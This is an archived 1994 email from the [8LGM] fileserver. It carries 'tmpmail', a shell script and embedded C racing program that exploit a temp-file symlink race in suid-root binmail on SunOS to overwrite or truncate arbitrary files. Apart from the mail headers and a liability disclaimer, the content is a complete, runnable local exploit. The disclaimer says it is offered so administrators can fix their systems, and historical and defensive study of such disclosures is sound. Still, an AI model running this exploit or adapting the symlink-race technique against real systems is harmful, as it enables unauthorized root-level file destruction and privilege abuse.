From Mercury!bagpuss.demon.co.uk!fileserv Sun Dec 25 19:45:02 1994 Return-Path: Received: by chinet.chinet.com (/\==/\ Smail3.1.28.1 #28.1{chinet}) id ; Sun, 25 Dec 94 19:45 CST Received: by mercury.mcs.com (/\==/\ Smail3.1.28.1 #28.5) id ; Sun, 25 Dec 94 19:05 CST Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa15076; 26 Dec 94 1:05 GMT Received: (root@localhost) by bagpuss.demon.co.uk (99.9/99.9) id BAA03022; Mon, 26 Dec 1994 01:06:09 GMT Date: Mon, 26 Dec 1994 01:06:09 GMT From: "[8LGM] Fileserver" Message-Id: <199412260106.BAA03022@bagpuss.demon.co.uk> To: Lauren Harper Reply-To: 8lgm-fileserver@bagpuss.demon.co.uk Subject: tmpmail Status: RO WE RESERVE THE RIGHT TO PUBLISH NAMES OF PEOPLE REQUESTING INFORMATION FROM OUR SERVER. IF YOU DO NOT AGREE TO THIS, PLEASE DO NOT REQUEST INFORMATION. This document is Copyright(C) 1994 by [8LGM] and your usage of the information contained within this document constitutes your agreement to render [8LGM] free from any direct or consequential liabililities or damages which may be incurred as the result of such usage. [8LGM] makes this information available in good faith, to make it possible for System Administrators to have the necessary tools to be able to fix their own systems. However [8LGM] does not endorse the usage of this information for any purposes. Permission is hereby granted for usage only in accordance with the conditions of usage as set forth herein. tmpmail: #!/bin/sh # tmpmail: overwrite files using binmail # # Usage: tmpmail to-file # # (c) [8lgm] 1994, tested under SunOS 4.1.2. # # # Note: Script only works if mail is suid root. # Other vendors may use tmpnam("ma"). # # This vulnerability can be exploited for sgid # mail binmails, the only modification would # be to predict the pid of the mail process # created by sendmail. This would be 4 forward # of the current pid - assuming a 'quiet' system. # # Will create to-file, or truncate. PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" # Check args if [ $# -ne 1 ]; then echo "Syntax: $PROG to-file" exit 1 fi TO_FILE="$1" # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi # Create our racing program! cat > mailrace.c << 'EOF' #include #include char path[] = "/tmp/maaXXXX"; main(argc,argv) int argc; char **argv; { int pid; char *trv; if (argc != 3) { fprintf(stderr, "Usage: %s pid tofile\n", argv[0]); exit(1); } pid = atoi(argv[1]); /* Stolen from mktemp.c */ for (trv = path; *trv; ++trv); /* extra X's get set to 0's */ while (*--trv == 'X') { *trv = (pid % 10) + '0'; pid /= 10; } symlink("/tmp/ShortSong", path); while(symlink(argv[2], path)); exit(0); } EOF cc -o mailrace mailrace.c # Check we now have mailrace if [ ! -x "mailrace" ]; then echo "$PROG: couldnt compile mailrace.c - check it out" exit 1 fi # create some input for binmail echo localhost $USER > /tmp/BlueRoom.$$ ./mailrace $$ $TO_FILE & exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$